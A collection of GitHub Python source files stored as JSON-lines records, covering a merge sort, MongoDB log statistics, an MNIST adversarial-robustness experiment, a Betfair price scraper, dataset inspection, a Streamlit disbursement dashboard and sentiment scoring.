+{"seq_id":"13653852736","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nclass Solution(object):\n def merge_sort(self, nums):\n answer = [] #創一個空的list\n if len(nums) <= 1: #如果list等於或小於1,就直接回傳該list\n return nums\n mid = int(len(nums)/2) #找出中間值在哪,拆解list\n left = self.merge_sort(nums[:mid]) \n right = self.merge_sort(nums[mid:])\n\n while (len(right) > 0) or (len(left) > 0):\n if len(right) > 0 and len(left) > 0: \n if right[0] > left[0]:\n answer.append(left[0])\n left.pop(0)\n else :\n answer.append(right[0])\n right.pop(0)\n elif len(right) > 0:\n for i in right:\n answer.append(i)\n right.pop(0)\n else:\n for i in left:\n answer.append(i)\n left.pop(0)\n\n return answer\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"yulin871030/my-learning-note","sub_path":"HW2/mergesort_06170131.py","file_name":"mergesort_06170131.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"15633800274","text":"#!/usr/bin/env python3\n\"\"\"\nModule 11\n\"\"\"\nfrom pymongo import MongoClient\n\n\ndef get_collections():\n \"\"\"returns the documents in the given collection\"\"\"\n client = MongoClient('mongodb://127.0.0.1:27017')\n logs = client.logs.nginx\n return logs\n\n\ndef main():\n \"\"\"This is where all the work is done\n \"\"\"\n logs = get_collections()\n print('{} logs'.format(logs.count_documents({})))\n print('Methods:')\n for method in [\"GET\", \"POST\", \"PUT\", \"PATCH\", \"DELETE\"]:\n log_count = list(logs.find({'method': method})).__len__()\n print('\\tmethod {}: {}'.format(method, log_count))\n len_status = list(\n logs.find({'method': 'GET', 'path': '/status'})).__len__()\n print('{} status check'.format(len_status))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"peterchibunna/alx-backend-storage","sub_path":"0x01-NoSQL/12-log_stats.py","file_name":"12-log_stats.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"9188651673","text":"#attack.py\nimport time\nimport pdb\nimport torch\nimport torch.nn as nn\nimport numpy as np\nimport foolbox as fb\nfrom functools import partial\nfrom torchvision import datasets, transforms\n\nclass LeNet5(nn.Module):\n def __init__(self, num_classes=10):\n super(LeNet5, self).__init__()\n self.layer1 = nn.Sequential(\n nn.Conv2d(1, 6, kernel_size=5, stride=1, padding=0),\n nn.BatchNorm2d(6),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size = 2, stride = 2))\n self.layer2 = nn.Sequential(\n nn.Conv2d(6, 16, kernel_size=5, stride=1, padding=0),\n nn.BatchNorm2d(16),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size = 2, stride = 2))\n self.fc = nn.Linear(400, 120)\n self.relu = nn.ReLU()\n self.fc1 = nn.Linear(120, 84)\n self.relu1 = nn.ReLU()\n self.fc2 = nn.Linear(84, num_classes)\n \n def forward(self, x):\n out = self.layer1(x)\n #pdb.set_trace()\n out = self.layer2(out)\n out = out.reshape(out.size(0), -1)\n out = self.fc(out)\n out = self.relu(out)\n out = self.fc1(out)\n out = self.relu1(out)\n out = self.fc2(out)\n return out\n\n\nclass MLP(nn.Module):\n def __init__(self, num_classes=10):\n super(MLP, self).__init__()\n self.fc = nn.Linear(1024, 300)\n self.relu = nn.ReLU()\n self.fc1 = nn.Linear(300, 300)\n self.relu1 = nn.ReLU()\n self.fc2 = nn.Linear(300, 100)\n self.relu2 = nn.ReLU()\n self.fc3 = nn.Linear(100, num_classes)\n \n def forward(self, x):\n out = x.reshape(x.size(0), -1)\n out = self.fc(out)\n out = self.relu(out)\n out = self.fc1(out)\n out = self.relu1(out)\n out = self.fc2(out)\n out = self.relu2(out)\n out = self.fc3(out)\n return out\n\n\n\ndef load_mnist():\n \n transform=transforms.Compose([\n transforms.Resize((32,32)),\n transforms.ToTensor(),\n #transforms.Normalize((0.1307,), (0.3081,))\n ])\n train_set = datasets.MNIST('data', train=True, download=True,\n transform=transform)\n test_set = datasets.MNIST('data', train=False,\n transform=transform)\n train_loader = torch.utils.data.DataLoader(train_set, batch_size=128, shuffle=True)\n test_loader = torch.utils.data.DataLoader(test_set, batch_size=128, shuffle=False)\n\n X_train, y_train, X_test, y_test = [], [], [], []\n for batch_idx, (img, label) in enumerate(train_loader):\n X_train.append(img)\n y_train.append(label)\n #print(batch_idx, img.shape, label.shape)\n for batch_idx, (img, label) in enumerate(test_loader):\n X_test.append(img)\n y_test.append(label)\n\n X_train = torch.cat(X_train).cuda() \n y_train = torch.cat(y_train).cuda()\n X_test = torch.cat(X_test).cuda()\n y_test = torch.cat(y_test).cuda() \n\n return X_train, y_train, X_test, y_test, train_loader, test_loader\n\ndef train(model, train_loader, name='lenet'):\n model.train()\n\n criterion = nn.CrossEntropyLoss()\n if name.lower() == 'lenet':\n optimizer = torch.optim.SGD(\n model.parameters(), \n momentum=0.9, \n lr=0.01, \n weight_decay = 0.0001\n )\n elif name.lower() == 'mlp':\n optimizer = torch.optim.Adam(\n model.parameters(), \n lr=0.001, \n weight_decay = 0.0001\n )\n \n epochs = 5\n scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer, epochs)\n for epoch in range(epochs):\n for batch_idx, (X, y) in enumerate(train_loader):\n X, y = X.cuda(), y.cuda()\n pred = model(X)\n loss = criterion(pred, y)\n loss.backward()\n optimizer.step() \n optimizer.zero_grad()\n scheduler.step()\n\n print('epoch: {}, loss: {:.2f}'.format(epoch, loss.item()))\n \n return model\n\ndef test(model, test_loader):\n model.eval()\n correct, nelement = 0, 0\n for batch_idx, (X, y) in enumerate(test_loader):\n X, y = X.cuda(), 
y.cuda()\n pred = model(X) \n #pdb.set_trace()\n correct += (torch.argmax(pred, axis=1) == y).sum().item()\n nelement += pred.shape[0]\n\n acc = correct/nelement\n print('Acc: {:.2f}'.format(acc*100))\n\n# X: feature (numpy) [0,255], sigma=1 means total change of 0 to 5\ndef add_noise(X, sigma=0, eps=0, noise_type=None): #is_uniform=False):\n\n # add noise\n X = torch.from_numpy(X).float()\n if noise_type == 'const':\n eps_prime = 255 * eps\n X_noisy = X + eps_prime\n elif noise_type == 'unif':\n eps_prime = 255 * eps\n X_noisy = X + torch.rand_like(X) * 2 * eps_prime - eps_prime\n #pass\n elif noise_type == 'normal':\n noise = torch.randn_like(X)\n max_val = noise.abs().max()\n noise = noise/max_val * (255 * eps)\n #pdb.set_trace()\n print(noise.abs().max())\n X_noisy = X + noise\n elif noise_type == 'sign':\n eps_prime = 255 * eps\n noise = eps_prime * (2 * torch.bernoulli(torch.ones_like(X)*0.5) - 1) \n print(noise.abs().max())\n X_noisy = X + noise\n else:\n raise NotImplementedError #X_noisy = X + torch.randn_like(X) * sigma * 5 \n X_noisy = torch.clamp(X_noisy, min=0, max=255).int()\n\n # check the norm of (X - X_noisy), for each sample\n print((X_noisy - X).max())\n #noise_norm = torch.norm(X_noisy - X, dim=1)\n #print('noise_norm: ', noise_norm)\n\n X_noisy = X_noisy.cpu().numpy()\n\n return X_noisy\n\n\n\n# X: feature (numpy), y: label (numpy)\ndef get_adv_ex(data='mnist', pretrained=False, eps=0.3, source='', target=''):#test_mlp_attack=0):\n\n if data.lower() != 'mnist':\n raise NotImplementedError\n\n # load model & data\n if source.lower() == 'lenet':\n model = LeNet5().cuda()\n elif source.lower() == 'mlp':\n model = MLP().cuda()\n else:\n raise NotImplementedError\n \n X_train, y_train, X_test, y_test, train_loader, test_loader = load_mnist()\n print(X_train.shape, y_train.shape, X_test.shape, y_test.shape)\n\n # train a model & test (on clean data)\n if pretrained:\n PATH = f'{source}_mnist.pth'\n model.load_state_dict(torch.load(PATH))\n else:\n model = train(model, train_loader)\n #test(model, train_loader)\n test(model, test_loader)\n\n # generate adversarial sample \n # make adv_test_loader using (X_adv_test, y_test)\n X_adv_test = attack_and_test(X_test, y_test, model, eps)\n adv_test_dataset = torch.utils.data.TensorDataset(X_adv_test, y_test)\n adv_test_loader = torch.utils.data.DataLoader(adv_test_dataset, batch_size=128, shuffle=False)\n test(model, adv_test_loader)\n\n # normalize & convert to numpy\n X_adv_test = (X_adv_test * 255).round().cpu().numpy().astype(int) \n X_train = (X_train * 255).round().cpu().numpy().astype(int)\n print(X_train.max(), X_train.min())\n print(X_adv_test.max(), X_adv_test.min())\n y_train = y_train.cpu().numpy()\n y_test = y_test.cpu().numpy()\n\n # save\n eps_str = f'_{eps}'.replace('.', '_')\n source_str = f'_{source}'\n # with open(f'mnist_X_train.npy', 'wb') as f:\n # np.save(f, X_train)\n # with open(f'mnist_y_train.npy', 'wb') as f:\n # np.save(f, y_train)\n # with open(f'mnist_adv_X_test{source_str}{eps_str}.npy', 'wb') as f:\n # np.save(f, X_adv_test)\n # with open(f'mnist_adv_y_test{source_str}{eps_str}.npy', 'wb') as f:\n # np.save(f, y_test)\n\n\n if target != source:\n\n if target.lower() == 'lenet':\n target_model = LeNet5().cuda()\n elif target.lower() == 'mlp':\n target_model = MLP().cuda()\n else:\n raise NotImplementedError\n\n if pretrained:\n PATH = f'{target}_mnist.pth'\n target_model.load_state_dict(torch.load(PATH))\n else: # train model // test on clean data & adversarial data\n model = train(target_model, 
train_loader, name=target.lower())\n test(target_model, test_loader)\n test(target_model, adv_test_loader)\n #exit()\n\n return X_train, y_train, X_adv_test, y_test\n\n\n\n\n\ndef attack_and_test(X, y, model, eps): #, Xmin, Xmax, eps):\n\n #X, y = X[:10], y[:10]\n\n attack_radius_fraction = eps # 0.3\n Xmin, Xmax = X.min(), X.max()\n eps = torch.tensor([(Xmax - Xmin) * attack_radius_fraction])\n print('Min: {}, Max: {}, Attack radius: {}'.format(Xmin, Xmax, eps))\n\n \n # load model\n model.eval() \n bounds = (Xmin, Xmax)\n fmodel = fb.PyTorchModel(model, bounds=bounds)\n\n # check the clean accuracy\n cln_acc = fb.utils.accuracy(fmodel, X, y)\n print('clean accuracy: ', cln_acc)\n\n #pdb.set_trace()\n\n # attack model\n # cls_samples = {}\n # num_labels = 10\n # for clss in range(num_labels):\n # idx = clean_pred != clss\n # cls_samples[clss] = X[idx][0] # Just pick the first example\n\n # for current_X, current_Y in zip(X,y):\n # starting_points = []\n # for y in current_Y:\n # starting_points.append(cls_samples[int(y)])\n # starting_points = torch.stack(starting_points, dim=0).to(device)\n # advs, _, success = attack_fn(fmodel, current_X, current_Y, starting_points=starting_points, epsilons=epsilon_list)\n\n start_time = time.time()\n\n #attack = fb.attacks.BoundaryAttack()#(steps=25000) #(init_attack = fb.attacks.SaltAndPepperNoiseAttack) #LinfDeepFoolAttack #L2CarliniWagnerAttack\n attack = fb.attacks.LinfProjectedGradientDescentAttack()\n raw, clipped, is_adv = attack(fmodel, X, y, epsilons=eps)#, starting_points=X)\n rob_acc = 1 - is_adv.float().mean(axis=-1)\n print('robust accuracy: ', rob_acc)\n \n fin_time = time.time()\n print('running time: {:.6f}'.format(fin_time - start_time))\n\n\n return clipped[0]\n\n\n\n# def transfer_attack(X, y, X_test, y_test, model='mlp'):\n# # input: X, y, X_test, y_test: array\n# # X, X_test: [0, 1, ..., 255]\n\n# if model.lower() != 'mlp':\n# raise NotImplementedError\n \n# # convert pixels in X to normalized tensor\n# # convert y to tensor\n# X, X_test = torch.from_numpy(X)/255, torch.from_numpy(X_test)/255\n# y, y_test = torch.from_numpy(y), torch.from_numpy(y_test)\n\n# # make dataloader\n# train_dataset = torch.utils.data.TensorDataset(X, y)\n# train_loader = torch.utils.data.DataLoader(train_dataset, batch_size=128, shuffle=True)\n# test_dataset = torch.utils.data.TensorDataset(X_test, y_test)\n# test_loader = torch.utils.data.DataLoader(test_dataset, batch_size=128, shuffle=False)\n\n# # load the model (MLP)\n\n\n# # train the model \n\n# # test the model \n\n","repo_name":"UW-Madison-Lee-Lab/LanguageInterfacedFineTuning","sub_path":"classification/utils/attack.py","file_name":"attack.py","file_ext":"py","file_size_in_byte":10878,"program_lang":"python","lang":"en","doc_type":"code","stars":90,"dataset":"github-code","pt":"69"}
+{"seq_id":"36120046840","text":"import os\nimport requests\nimport pypyodbc as odbc #pip install pypyodbc\nfrom urllib.parse import urljoin\nfrom bs4 import BeautifulSoup #pip install beautifulsoup4\nimport pandas as pd #pip install pandas\n\n\n# Add your settings\nDRIVER = 'SQL Server'\nSERVER_NAME = 'YOUR-SERVER-NAME'\nDATABASE_NAME = 'BetfairData'\n\n# Filters csv URL prefixes\n# Currently looks for UK & IE 'place' files\n# Can switch out to look for 'win' files\n\ndef matc(string):\n if 'dwbfpricesukplace' in string or 'dwbfpricesireplace' in string:\n return True\n return False\n\nurl = 'https://promo.betfair.com/betfairsp/prices'\n\n# Downloads csv files to the folder below and reimports to SQL Server\n# Add your preferred location to download the csv\n\nfolder_location = r'C:\\betfairdata'\nif not os.path.exists(folder_location):os.mkdir(folder_location)\n\nresponse = requests.get(url)\nsoup= BeautifulSoup(response.text, \"html.parser\")\n\n\ndef connection_string(driver, server_name, database_name):\n conn_string = f\"\"\"\n DRIVER={{{driver}}};\n SERVER={server_name};\n DATABASE={database_name};\n Trust_Connection=yes;\n \"\"\"\n return conn_string\n\ntry:\n conn = odbc.connect(connection_string(DRIVER, SERVER_NAME, DATABASE_NAME))\nexcept odbc.DatabaseError as e:\n print(\"Database error\")\n print(str(e.value[1]))\nexcept odbc.Error as e:\n print(\"Connection Error:\")\n print(str(e.value[1]))\n\ncursor = conn.cursor()\n\n# Include your SQL tablename\nsql_insert ='''\n INSERT INTO PlaceData\n VALUES (?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?)\n'''\n\n\n# Dates are converted to int. eg 05-01-2010converts to 20100105\nDate = input(\"Enter the Start DATE (DD-MM-YYYY) : \") #Start Date\nDate = \"\".join(Date.split('-'))\nDate = int(Date[4:] + Date[2:4] + Date[:2])\n\nEndDate = input(\"Enter End DATE (DD-MM-YYYY) : \")\nEndDate = \"\".join(EndDate.split('-')) #End Date\nEndDate = int(EndDate[4:] + EndDate[2:4] + EndDate[:2])\n\nfor link in soup.select(\"a[href$='.csv']\"):\n\n # Fdate is extracted from the name of the csv file\n Fdate = str(link['href'])[-12:-4]\n Fdate = \"\".join(Fdate.split('-'))\n Fdate = int(Fdate[4:] + Fdate[2:4] + Fdate[:2])\n\n # Checking the condition Condition\n if matc(link['href']) and Fdate <= EndDate and Fdate >= Date: #Between StartDate and EndDate\n\n filename = os.path.join(folder_location,link['href'].split('/')[-1])\n\n with open(filename, 'wb') as f:\n f.write(requests.get(urljoin(url,link['href'])).content)\n\n df = pd.read_csv(filename)\n rc = df.shape[0]\n\n for i in range(rc):\n df['EVENT_DT'].iloc[i] = df['EVENT_DT'].iloc[i] + \":00\"\n\n df['EVENT_DT'] = pd.to_datetime(df['EVENT_DT']).dt.strftime('%Y-%m-%d %H:%M:%S')\n df.fillna(0, inplace=True)\n records = df.values.tolist()\n\n\n try:\n\n cursor.executemany(sql_insert, records)\n cursor.commit();\n except Exception as e:\n cursor.rollback()\n print(str(e))\n finally:\n print(\"Done\")\n\n # Cleans temporarily downloaded CSVs\n os.remove(filename)\n\n\nprint(\"ALL FILES TRANSFERED\")\ncursor.close()\nconn.close()\n","repo_name":"Deruzala/Betfair-Data-Scraper","sub_path":"Betfair-Data-Scraper.py","file_name":"Betfair-Data-Scraper.py","file_ext":"py","file_size_in_byte":3330,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"71"}
+{"seq_id":"38921259600","text":"#!/usr/bin/env python3\nimport argparse\nimport json\n\nimport pandas\n\n\"\"\"Read and output stat. information on a jsonic dataset\"\"\"\n\n\ndef inspect(dataset_path):\n with open(dataset_path) as f:\n dset = json.load(f)\n\n traintest = ('train', 'test')\n samples = {x: 0 for x in traintest}\n mean_num_words = {x: 0 for x in traintest}\n\n # for summarization datasets\n label_samples = {x: {} for x in traintest}\n mean_sentences_per_doc = {x: 0 for x in traintest}\n mean_summary_sentences_per_doc = {x: 0 for x in traintest}\n\n for ttest in traintest:\n if ttest not in dset['data']:\n continue\n data = dset['data'][ttest]\n if len(data) == 0:\n print(\"no samples!\")\n continue\n samples[ttest] = len(data)\n\n num_words = []\n num_sents = {}\n num_summary_sents = {}\n for datum in data:\n words = datum['text'].split()\n num_words.append(len(words))\n labels = datum['labels']\n for lab in labels:\n if lab not in label_samples[ttest]:\n label_samples[ttest][lab] = 0\n label_samples[ttest][lab] += 1\n\n\n if \"document_index\" in datum:\n # num sentences\n doc_idx = datum[\"document_index\"]\n if doc_idx not in num_sents:\n num_sents[doc_idx] = 0\n num_sents[doc_idx] += 1\n\n # num summary sentences\n if 1 in datum['labels']:\n if doc_idx not in num_summary_sents:\n num_summary_sents[doc_idx] = 0\n num_summary_sents[doc_idx] += 1\n\n mean_num_words[ttest] = sum(num_words) / len(data)\n if num_sents:\n mean_sentences_per_doc[ttest] = sum(\n num_sents.values()) / len(num_sents)\n if num_summary_sents:\n mean_summary_sentences_per_doc[ttest] = sum(\n num_summary_sents.values()) / len(num_summary_sents)\n\n stats = {\n \"samples\": {\n \"train\": samples['train'],\n \"test\": samples['test']\n },\n \"mean_num_words\": {\n \"train\": mean_num_words['train'],\n \"test\": mean_num_words['test']\n },\n \"mean_num_sentences\": {\n \"train\": mean_sentences_per_doc[\"train\"],\n \"test\": mean_sentences_per_doc[\"test\"]\n },\n \"mean_num_summary_sentences\": {\n \"train\": mean_summary_sentences_per_doc[\"train\"],\n \"test\": mean_summary_sentences_per_doc[\"test\"]\n },\n \"samples_per_label\": {\n \"train\": label_samples[\"train\"],\n \"test\": label_samples[\"test\"]\n }\n\n }\n df = pandas.DataFrame.from_dict(stats, orient='index')\n\n print(dataset_path, \"\\n\")\n print(df.round(3).to_string())\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Read and output stat. information on a jsonic dataset')\n parser.add_argument('dataset_path')\n args = parser.parse_args()\n inspect(args.dataset_path)\n","repo_name":"npit/nlp-semantic-augmentation","sub_path":"tools/inspect-dataset.py","file_name":"inspect-dataset.py","file_ext":"py","file_size_in_byte":3099,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"}
+{"seq_id":"14591815346","text":"import streamlit as st\nimport pandas as pd\nfrom streamlit.logger import get_logger\nimport altair as alt\nimport threading\nimport io # <-- Importa io\n\nLOGGER = get_logger(__name__)\n_lock = threading.Lock()\n\ndef process_dataframe(xls_path):\n with _lock:\n xls = pd.ExcelFile(xls_path, engine='openpyxl')\n desembolsos = xls.parse('Desembolsos')\n operaciones = xls.parse('Operaciones')\n\n # Asegúrate de que las columnas 'SECTOR' y 'SUBSECTOR' estén en 'operaciones'\n merged_df = pd.merge(desembolsos, operaciones[['IDEtapa', 'FechaVigencia', 'AporteFonplata', 'SECTOR', 'SUBSECTOR']], on='IDEtapa', how='left')\n merged_df['FechaEfectiva'] = pd.to_datetime(merged_df['FechaEfectiva'], dayfirst=True)\n merged_df['FechaVigencia'] = pd.to_datetime(merged_df['FechaVigencia'], dayfirst=True)\n merged_df['Ano'] = ((merged_df['FechaEfectiva'] - merged_df['FechaVigencia']).dt.days / 366).astype(int)\n merged_df['Meses'] = ((merged_df['FechaEfectiva'] - merged_df['FechaVigencia']).dt.days / 30).astype(int)\n\n result_df = merged_df.groupby(['IDEtapa', 'Ano', 'Meses', 'IDDesembolso', 'AporteFonplata'])['Monto'].sum().reset_index()\n result_df['Monto Acumulado'] = result_df.groupby(['IDEtapa'])['Monto'].cumsum().reset_index(drop=True)\n result_df['Porcentaje del Monto'] = result_df['Monto'] / result_df['AporteFonplata'] * 100\n result_df['Porcentaje del Monto Acumulado'] = result_df['Monto Acumulado'] / result_df['AporteFonplata'] * 100\n\n country_map = {'AR': 'Argentina', 'BO': 'Bolivia', 'BR': 'Brasil', 'PY': 'Paraguay', 'UR': 'Uruguay'}\n result_df['Pais'] = result_df['IDEtapa'].str[:2].map(country_map).fillna('Desconocido')\n\n # Añadir 'SECTOR', 'SUBSECTOR' y 'FechaVigencia' al DataFrame resultante\n result_df = pd.merge(result_df, operaciones[['IDEtapa', 'SECTOR', 'SUBSECTOR', 'FechaVigencia']], on='IDEtapa', how='left')\n\n return result_df\n\n\ndef dataframe_to_excel_bytes(df):\n output = io.BytesIO()\n with pd.ExcelWriter(output, engine='openpyxl') as writer:\n df.to_excel(writer, sheet_name='Resultados', index=False)\n output.seek(0)\n return output\n\ndef run():\n st.set_page_config(\n page_title=\"Desembolsos\",\n page_icon=\"👋\",\n )\n\n st.title(\"Matrices de Desembolsos 📊\")\n st.write(\"Carga tu archivo Excel y explora las métricas relacionadas con los desembolsos.\")\n uploaded_file = st.file_uploader(\"Carga tu Excel aquÃ\", type=\"xlsx\")\n \n if uploaded_file:\n result_df = process_dataframe(uploaded_file)\n st.write(result_df)\n \n # Convertir el DataFrame a bytes y agregar botón de descarga\n excel_bytes = dataframe_to_excel_bytes(result_df)\n st.download_button(\n label=\"Descargar DataFrame en Excel\",\n data=excel_bytes,\n file_name=\"resultados_desembolsos.xlsx\",\n mime=\"application/vnd.openxmlformats-officedocument.spreadsheetml.sheet\"\n )\n \n filtered_df = result_df\n \n # Calcular Monto y Monto Acumulado para cada año\n df_monto_anual = filtered_df.groupby('Ano')[\"Monto\"].sum().reset_index()\n df_monto_acumulado_anual = df_monto_anual['Monto'].cumsum()\n\n # Calcular Porcentaje del Monto de forma acumulativa\n aporte_total = filtered_df['AporteFonplata'].iloc[0] # Asume que AporteFonplata es constante\n df_porcentaje_monto_anual = (df_monto_anual['Monto'] / aporte_total * 100).round(2)\n df_porcentaje_monto_acumulado_anual = (df_monto_acumulado_anual / aporte_total * 100).round(2)\n\n # Crear DataFrame combinado para el cuadro de resumen\n combined_df = pd.DataFrame({\n 'Ano': df_monto_anual['Ano'],\n 'Monto': 
df_monto_anual['Monto'],\n 'Monto Acumulado': df_monto_acumulado_anual,\n 'Porcentaje del Monto': df_porcentaje_monto_anual,\n 'Porcentaje del Monto Acumulado': df_porcentaje_monto_acumulado_anual\n })\n\n st.write(\"Resumen de Datos:\")\n\n combined_df = process_dataframe(uploaded_file)\n \n # Filtrar por paÃses múltiples\n countries = combined_df['Pais'].unique()\n selected_countries = st.multiselect('Selecciona PaÃses:', countries, default=countries)\n filtered_df = combined_df[combined_df['Pais'].isin(selected_countries)]\n\n # Configuración del formato de visualización de los DataFrame\n pd.options.display.float_format = '{:,.2f}'.format\n\n # Crear la tabla de Montos con años como columnas y IDEtapa como filas\n montos_pivot = filtered_df.pivot_table(\n index='IDEtapa', \n columns='Ano', \n values='Monto', \n aggfunc='sum'\n ).fillna(0)\n\n # Convertir los montos a millones\n montos_pivot = (montos_pivot / 1_000_000).round(3)\n\n # Agregar la columna de totales al final de la tabla de Montos\n montos_pivot['Total'] = montos_pivot.sum(axis=1)\n\n # Crear la tabla de Porcentajes con años como columnas y IDEtapa como filas\n porcentaje_pivot = filtered_df.pivot_table(\n index='IDEtapa', \n columns='Ano', \n values='Porcentaje del Monto', \n aggfunc='sum'\n ).fillna(0)\n\n # Redondear a dos decimales en el DataFrame de porcentajes\n porcentaje_pivot = porcentaje_pivot.round(2)\n\n # Agregar la columna de totales al final de la tabla de Porcentajes\n porcentaje_pivot['Total'] = porcentaje_pivot.sum(axis=1).round(0)\n\n # Mostrar las tablas en Streamlit con un ancho fijo y la posibilidad de desplazamiento horizontal\n st.write('Tabla de Montos En Millones de USD:')\n st.dataframe(montos_pivot, width=1500, height=600) # Ajusta el ancho y alto según sea necesario\n\n # Convertir el DataFrame a bytes y agregar botón de descarga\n excel_bytes = dataframe_to_excel_bytes(montos_pivot)\n st.download_button(\n label=\"Descargar DataFrame en Excel\",\n data=excel_bytes,\n file_name=\"matriz_montos_desembolsos.xlsx\",\n mime=\"application/vnd.openxmlformats-officedocument.spreadsheetml.sheet\"\n )\n\n st.write('Tabla de Porcentajes del Monto:')\n st.dataframe(porcentaje_pivot, width=1500, height=600)\n\n # Convertir el DataFrame a bytes y agregar botón de descarga\n excel_bytes = dataframe_to_excel_bytes(porcentaje_pivot)\n st.download_button(\n label=\"Descargar DataFrame en Excel\",\n data=excel_bytes,\n file_name=\"matriz_porcentaje_desembolsos.xlsx\",\n mime=\"application/vnd.openxmlformats-officedocument.spreadsheetml.sheet\"\n )\n\n # Aplicando la misma lógica para calcular los años hasta ahora y la categorización\n porcentaje_pivot['Años hasta Ahora'] = porcentaje_pivot.iloc[:, 1:10].apply(\n lambda row: row.last_valid_index(), axis=1\n )\n\n # Creando la función de categorización\n def categorize_project(row):\n if row['Total'] == 100:\n return 'Completado'\n elif row['Total'] >= 50:\n return 'Últimos Desembolsos'\n else:\n return 'Empezando sus Desembolsos'\n\n # Identificamos las columnas que contienen los porcentajes por año, excluyendo 'Total' y 'Años hasta Ahora'\n year_columns = [col for col in porcentaje_pivot.columns if col not in ['Total', 'Años hasta Ahora']]\n\n # Encontramos el último año con un valor que no sea cero para cada proyecto\n last_year_with_value = porcentaje_pivot[year_columns].apply(lambda row: row[row > 0].last_valid_index(), axis=1)\n\n # Agregamos esta información al DataFrame\n porcentaje_pivot['Último Año'] = last_year_with_value\n\n # Creando la columna de 
categorización\n porcentaje_pivot['CategorÃa'] = porcentaje_pivot.apply(categorize_project, axis=1)\n\n # Restableciendo el Ãndice para convertir 'IDEtapa' de nuevo en una columna\n porcentaje_pivot_reset = porcentaje_pivot.reset_index()\n\n # Seleccionando las columnas para la tabla final\n final_table_pivot = porcentaje_pivot_reset[['IDEtapa', 'Total', 'Último Año', 'CategorÃa']]\n\n # Creando la columna de categorización\n porcentaje_pivot['CategorÃa'] = porcentaje_pivot.apply(categorize_project, axis=1)\n\n # Contando el número de proyectos en cada categorÃa\n category_counts_pivot = porcentaje_pivot['CategorÃa'].value_counts()\n\n # Utilizar st.columns para colocar gráficos lado a lado\n col1, col2 = st.columns(2)\n with col1:\n # Mostrando las primeras filas de la tabla final\n final_table_pivot\n\n with col2:\n # Mostrando las primeras filas de la tabla final\n category_counts_pivot\n\n \n\nif __name__ == \"__main__\":\n run()\n","repo_name":"sandrocoronado/curvadesembolsos","sub_path":"pages/0_Matrices_Desembolsos.py","file_name":"0_Matrices_Desembolsos.py","file_ext":"py","file_size_in_byte":8922,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"75150806309","text":"\"\"\"\nMain function of the RPG. Short game description follows as soon as title and content of the game are designed\nThis file is made up of two parts:\n The initiation to init all parameters that need to be initiated only once\n The while loop that runs until the game is stopped somehow\n\"\"\"\n\nimport pygame\nimport os\nfrom files.gamestate import gamestate\nfrom files.game_settings import settings\nimport time # only for fps\n\n##environment variables\n#WIDTH, HEIGHT = 800, 800\n\n\n\n\n\n\n\n\ndef main():\n #constants\n FPS = 60\n SHOWFPS = True\n\n ##inits\n game_settings = settings()\n clock = pygame.time.Clock()\n WIN = pygame.display.set_mode((game_settings.screen_width, game_settings.screen_height))#for Fullscreen: (0, 0), pygame.FULLSCREEN\n pygame.display.set_caption(game_settings.game_title)\n game_state = gamestate(WIN,pygame)\n\n game_state.load() # initial tile load before loop start\n\n\n ##loop\n while game_state.run:\n start_time = time.time()# for FPS calculation\n game_state.gamestate_manager()\n\n clock.tick(FPS)\n if SHOWFPS:\n print(\"FPS:\" ,1/(time.time() -start_time))\n\n\n #save game \n game_settings.save_settings()\n\n\n\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"sebastianDebatin/RPG","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"20391587158","text":"from snownlp import SnowNLP\r\nimport pandas as pd\r\n\r\n\r\ndef get_score(text): #\r\n s = SnowNLP(text) # snownlp中的SnowNLP函数对text文本进行分词处理\r\n return s.sentiments # sentiments函数进行情感分析,即获得文本的情感评分\r\n\r\n\r\ndf = pd.read_excel(\"LiHongLiang.xlsx\") # 把xlsx中的评论读入变量df中\r\ndf[\"score\"] = df.comments.apply(get_score) # 对comments列的所有文本分别进行分词和情感分析,并将情感分析结果导入score列\r\ndf.to_excel(\"LiHongLiang.xlsx\") # 把df的内容读出到xlsx文档\r\nprint(df.head()) # 输出头部五行数据\r\n","repo_name":"Nullah-Wang/weibo-data-analysis","sub_path":"data analysis/snowNPL_test.py","file_name":"snowNPL_test.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"32618110601","text":"import pandas as pd\n\n\ndata = pd.read_csv(\"/Users/gavinkoma/Desktop/pattern_rec/final/data_s14/dev/13/f013000.csv\")\nprint(data.head())\ntrain = pd.read_csv(\"/Users/gavinkoma/Desktop/pattern_rec/final/data_s14/train/02/f002000.csv\")\nprint(train.head())\n\n\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.metrics import multilabel_confusion_matrix,\\\n classification_report, \\\n log_loss, \\\n accuracy_score\nfrom sklearn import metrics\nimport csv\n\nmodel1 = MLPClassifier(hidden_layer_sizes=(30,15,10,5),\n \t activation=\"tanh\",\n \t random_state=1,\n \t \t max_iter=2000)\n\t\nx_train = train.drop(['class'], axis=1)\ny_train = train['class']\n#print(type(model).__name__)\nmodel.partial_fit(x_train,y_train,classes=[0,1,2,3,4])\n\n\n\n\n\n\n\n","repo_name":"gavinkoma/pattern_rec","sub_path":"pattern_rec/final/eval_functions.py","file_name":"eval_functions.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
